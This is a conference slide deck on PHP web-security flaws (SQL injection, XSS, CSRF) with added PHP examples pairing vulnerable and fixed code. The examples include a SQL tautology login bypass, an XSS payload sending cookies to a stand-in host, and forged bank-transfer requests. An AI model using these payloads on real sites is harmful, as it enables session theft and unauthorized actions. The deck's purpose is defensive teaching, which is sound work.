[PHPCamp] OWASP PHP Top 5 + CSRF

OWASP PHP Top 5 plus CSRF
Bipin Upadhyay, Satyam Computers
http://projectbee.org/


Presentation on OWASP PHP Top 5 and CSRF, presented at PHPCamp, Pune, on September 20th, 2008



"The first matrix I designed was quite naturally, perfect. It was a work of art. Flawless. Sublime. A triumph only equaled by its monumental failure."


Agenda

Introduction to AppSecurity
– Why?
– OWASP

OWASP PHP Top 5 – Intro & Mitigation
– The Boring 3
– The Exciting 2
– CSRF



Who Am I?

I am SpiderMan

Apart from that, I:
– work for Satyam Computers,
– work as PHP Lead,
– am currently working on OpenSocial,
– also work on App Sec, and
– am also a part of the OWASP Bangalore Chapter.

I can be pinged at:
– Om-[AT]-Projectbee-[Dot]-org, and
– http://projectbee.org/


Network Sec. versus App Sec.

[Diagram: attacker → firewall/IDS/IPS → web server. Of ports 0–65535 the firewall leaves 80 and 443 open, and the attacker's traffic to the web application travels over exactly those two ports.]


Network Sec. versus App Sec…

[Diagram: victim behind a firewall/NATed IP (ports 0–65535), connecting out to a malicious or compromised web server. The victim's browser initiates the connection, so the firewall lets whatever the server sends back straight through.]


How serious is the matter!

90% of web applications have serious vulnerabilities – Gartner Group

78% of attacks are at the web application level – Symantec

XSS and SQLi are replacing buffer overflows as the favourite hacker initiative – Mitre

8–9 out of every 10 sites are vulnerable to XSS – WASC


Scary Cracks

Credit Cards & Google

Google.com UTF-7 XSS Vulnerability

Yamanner

“Samy is my Hero” OR Samy Worm

GMail CSRF Vulnerability


OWASP

A free and open community focused on improving App Security

Guides, tools, etc. freely available for use

OWASP PHP TOP 5 is a list of top 5 PHP vulnerabilities

YOU can start your own project and/or contribute too


OWASP PHP Top 5

The Boring Trio
– P1. Remote Code Execution
– P4. PHP Configurations
– P5. File System Attacks

The Exciting Duo
– P3. SQL Injection Attacks
– P2. XSS (Cross Site Scripting)


OWASP PHP Top 5

The Boring Trio
– P1. Remote Code Execution
– P4. PHP Configurations
– P5. File System Attacks

Arguably a little outdated. They don't excite me enough to talk about here; read up on them yourself :D


OWASP PHP Top 5

The Exciting Duo
– P3. SQL Injection Attacks
– P2. XSS (Cross Site Scripting)

Injection flaws are A2 in the OWASP Top 10 (2007)

XSS is A1 in the OWASP Top 10 (2007)

The femme-fatale attacks


P3. SQL Injections – Intro

Unsanitized user data that reaches the database can be executed as part of the SQL query instead of being treated as a value.

[Comic from http://xkcd.com]


P3. SQL Injections – Intro

Demo


P3. SQL Injections – Mitigation

Validate data; prefer whitelisting

Use prepared statements with bound parameters – PDO if possible, otherwise MySQLi or the PEAR database packages; the input is then sent as data and is never parsed as SQL

If you are stuck with the legacy mysql extension, use mysql_real_escape_string() on every string value. It only protects quoted string literals, so numeric parameters must be cast separately, and it needs an open connection because it escapes according to the connection's character set

Turn OFF magic_quotes_gpc (deprecated in PHP 5.3 and removed in 5.4); escape at the query, not at input
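The demo and the mitigation list above, as an added example that is not part of the original deck: the same login lookup written with string concatenation and with a PDO prepared statement, run against an in-memory SQLite database so no MySQL server is needed. It assumes the pdo_sqlite extension is loaded; the table, its rows, the function names and the attacker string are all constructed for the example.

```php
<?php
// Added example (not from the slides): SQL injection through string
// concatenation, and the prepared-statement fix. Assumes the pdo_sqlite
// extension; the users table, its rows and the attacker input are constructed.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)');
// Plain-text passwords only to keep the example short; never store them this way.
$db->exec("INSERT INTO users (name, password) VALUES ('alice', 's3cret'), ('bob', 'hunter2')");

// Vulnerable: the user's bytes become part of the SQL text, so quotes and
// operators in the input are parsed as SQL.
function loginVulnerable(PDO $db, string $name, string $password): array
{
    $sql = "SELECT id, name FROM users WHERE name = '$name' AND password = '$password'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: the query text is fixed at prepare time; the driver sends the
// input as values, so the same bytes are compared literally against the columns.
function loginSafe(PDO $db, string $name, string $password): array
{
    $stmt = $db->prepare('SELECT id, name FROM users WHERE name = :name AND password = :password');
    $stmt->execute([':name' => $name, ':password' => $password]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed attacker input: a tautology that is also not anyone's password.
$attack = "' OR '1'='1";

// The concatenated WHERE clause becomes
//   name = '' OR '1'='1' AND password = '' OR '1'='1'
// which is true for every row, so every user comes back without a password.
$rows = loginVulnerable($db, $attack, $attack);
printf("vulnerable query returned %d user(s)\n", count($rows));

// With a bound parameter the name column is compared against the literal
// string "' OR '1'='1", which no row contains.
$rows = loginSafe($db, $attack, $attack);
printf("prepared statement returned %d user(s)\n", count($rows));

// A genuine login still succeeds through the safe path.
$rows = loginSafe($db, 'alice', 's3cret');
printf("alice with the right password: %d user(s)\n", count($rows));
```

Note that `mysql_real_escape_string()` would have saved this particular query only because both parameters sit inside quotes; an unquoted numeric parameter such as `WHERE id = $id` is still injectable after escaping, which is why the bound-parameter form is the one to standardise on.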


P2. XSS – Intro

OWASP Top 10 2007 #1

Any user input that is reflected back to the user without being properly encoded for the context it lands in.

The input can be HTML, CSS, or JavaScript

Three kinds – Reflected, Stored (persistent), and DOM-based XSS


P2. XSS – Intro

XSS attacks include, but are not limited to:
– Cookie theft & session hijacking
– Site defacement & phishing
– Key logging
– History theft
– Port scanning
– CSRF & web worms
– DoS-ing
– … limited only by imagination


P2. XSS – Intro

Reflective XSS Demo

Stored XSS Demo


P2. XSS – Mitigation

Proper encoding avoids most problems

Input encoding
– declare the character set explicitly; prefer UTF-8 or ISO-8859-1, so the browser never has to guess (the Google UTF-7 XSS listed earlier exploited exactly that)
– refer to http://ha.ckers.org/charsets.html

Output encoding
– avoid rich HTML input from the user
– encode on output with htmlspecialchars() or htmlentities(); pass ENT_QUOTES and the charset, otherwise single quotes stay unencoded and an attacker can break out of an attribute
– refer to the OWASP_Encoding_Project

Use HTMLPurifier to allow only whitelisted HTML where rich input is unavoidable
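The reflected-XSS demo and the output-encoding advice above, as an added example that is not part of the original deck: the unencoded output beside the htmlspecialchars() version, for a text node and for an attribute value, with the charset declared up front. The payloads and function names (including the e() helper) are constructed for the example; it needs PHP 5.4 or later for ENT_SUBSTITUTE.

```php
<?php
// Added example (not from the slides): output encoding for two HTML contexts,
// beside the unencoded version a reflected XSS exploits. Payloads are
// constructed; e() is an illustrative helper name. Needs PHP >= 5.4.

// Declare the charset explicitly so the browser never has to sniff one;
// UTF-7 auto-detection is what made the Google XSS from the earlier slide work.
header('Content-Type: text/html; charset=UTF-8');

function e(string $s): string
{
    // ENT_QUOTES encodes both ' and ", so the result is safe inside single-
    // or double-quoted attributes as well as in text. ENT_SUBSTITUTE replaces
    // invalid UTF-8 instead of silently returning an empty string.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Text context.
function greetVulnerable(string $name): string
{
    return "<p>Hello, $name</p>";
}
function greetSafe(string $name): string
{
    return '<p>Hello, ' . e($name) . '</p>';
}

// Attribute context. The common mistake is to remove tags only, which leaves
// a quote free to close the attribute and start an event handler.
function searchBoxVulnerable(string $q): string
{
    return "<input type='text' name='q' value='" . strip_tags($q) . "'>";
}
function searchBoxSafe(string $q): string
{
    return "<input type='text' name='q' value='" . e($q) . "'>";
}

$textPayload = '<script>document.location="http://evil.example/?c="+document.cookie</script>';
$attrPayload = "' onfocus='alert(document.cookie)' autofocus='";

echo greetVulnerable($textPayload), "\n"; // the script element reaches the browser as markup
echo greetSafe($textPayload), "\n";       // the same bytes arrive as visible text

echo searchBoxVulnerable($attrPayload), "\n"; // nothing for strip_tags to strip; the quote breaks out
echo searchBoxSafe($attrPayload), "\n";       // the quotes are encoded, so the value stays a value
```

Run it from the command line and compare the four lines: the safe variants contain no `<script>` element and no unencoded quote, whichever payload was reflected.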


CSRF – Intro

Also called Unauthorized Requests.

The server is exploited for trusting the user's browser: any request that carries the session cookie looks legitimate, whether or not the user meant to send it.

CSRF is, arguably, more dangerous than XSS.

Doesn't necessarily require JavaScript; an <img> tag or a plain HTML form is enough.

OWASP Top 10 2007 #5 (also called the Sleeping Giant)


CSRF – Intro

GET-CSRF Demo

POST-CSRF Demo


CSRF – Mitigation

Identify the points to protect – the state-changing actions; not all are equally important

Use nonces – one-time tokens that the attacker's page cannot read, because the same-origin policy keeps your pages out of its reach

Embed the nonces in URLs or forms, and verify them server-side before acting; hidden form fields sent by POST are preferable, since a token in a URL leaks through the Referer header and browser history
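The GET-CSRF and POST-CSRF demos and the nonce mitigation above, as an added example that is not part of the original deck: the attacker's page as a constructed HTML string, and the token issue, embed and verify steps on the site's side, using the PHP session as the token store. The bank URLs, request arrays and function names are hypothetical; it needs PHP 7.1 or later (random_bytes() and array destructuring in foreach).

```php
<?php
// Added example (not from the slides): the two CSRF requests from the demos
// and the one-time-token defence. Session is the token store; URLs, request
// arrays and function names are constructed for illustration. Needs PHP >= 7.1.

if (session_status() === PHP_SESSION_NONE) {
    session_start();
}

// The attacker's page. Nothing here needs JavaScript: the browser attaches
// the victim's bank session cookie to both requests on its own.
function attackerPage(): string
{
    return '<img src="http://bank.example/transfer.php?to=attacker&amount=1000">'  // GET-CSRF
         . '<form method="post" action="http://bank.example/transfer.php">'         // POST-CSRF
         . '<input type="hidden" name="to" value="attacker">'
         . '<input type="hidden" name="amount" value="1000">'
         . '<button>Click for a free gift</button></form>';
}

// One random token per session. For strict one-time nonces, issue a fresh
// token per form, keep them in a list and delete each entry when it is used.
function csrfToken(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// The site's own form carries the token as a hidden field. The attacker's
// page cannot read it: the same-origin policy keeps bank.example's responses
// out of reach of evil.example's scripts.
function transferForm(): string
{
    $token = htmlspecialchars(csrfToken(), ENT_QUOTES, 'UTF-8');
    return '<form method="post" action="/transfer.php">'
         . '<input type="hidden" name="csrf_token" value="' . $token . '">'
         . '<input name="to"> <input name="amount"> <button>Transfer</button></form>';
}

// Check before any side effect. Refusing GET outright also removes the <img>
// vector; hash_equals() compares in constant time so the token cannot be
// recovered byte by byte through response timing.
function csrfCheck(string $method, array $post): bool
{
    if ($method !== 'POST') {
        return false;
    }
    $expected = $_SESSION['csrf_token'] ?? '';
    $sent     = $post['csrf_token'] ?? '';
    return $expected !== '' && is_string($sent) && hash_equals($expected, $sent);
}

// Constructed requests as transfer.php would see them.
$forgedGet  = ['to' => 'attacker', 'amount' => '1000'];           // from the <img>
$forgedPost = $forgedGet;                                          // from the hidden form, no token
$wrongToken = $forgedGet + ['csrf_token' => str_repeat('0', 64)];  // attacker guessing a token
$legitPost  = $forgedGet + ['csrf_token' => csrfToken()];          // submitted from transferForm()

// Only the request that carries the session's own token is accepted.
foreach ([['GET', $forgedGet], ['POST', $forgedPost], ['POST', $wrongToken], ['POST', $legitPost]] as [$m, $p]) {
    $shown = isset($p['csrf_token']) ? substr($p['csrf_token'], 0, 8) . '...' : '(no token)';
    printf("%-4s %-12s -> %s\n", $m, $shown, csrfCheck($m, $p) ? 'accepted' : 'rejected');
}
```

The check has to run on every state-changing endpoint, not only the one the demo targets; a single unprotected action is all a forged request needs.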


Purification algo

Sanitize anything that comes from the user.

The order of purification is equally important: decode before you validate, otherwise a URL- or entity-encoded payload slips past the check, and encode for the output context as the very last step.


About Satyam

PHP
– Satyam's PHP Unit is actively involved in consulting and developing PHP-based web applications
– Also competent in smooth migration from existing infrastructure to PHP-based solutions
– A well-defined stack of tools, e.g. PHPUnit, Phing, Propel, Xinc, etc., used by developers for streamlined development

OpenSocial
– Early adopters of OpenSocial
– Dedicated team of Java & PHP developers working on OpenSocial
– Currently helping a social network with a 10 million registered user base become OpenSocial compliant


String.fromCharCode(84,104,97,110,107,32,89,111,117,33)

i.e., Thank You!


Thank You

Got Queries? Kindly raise your hands.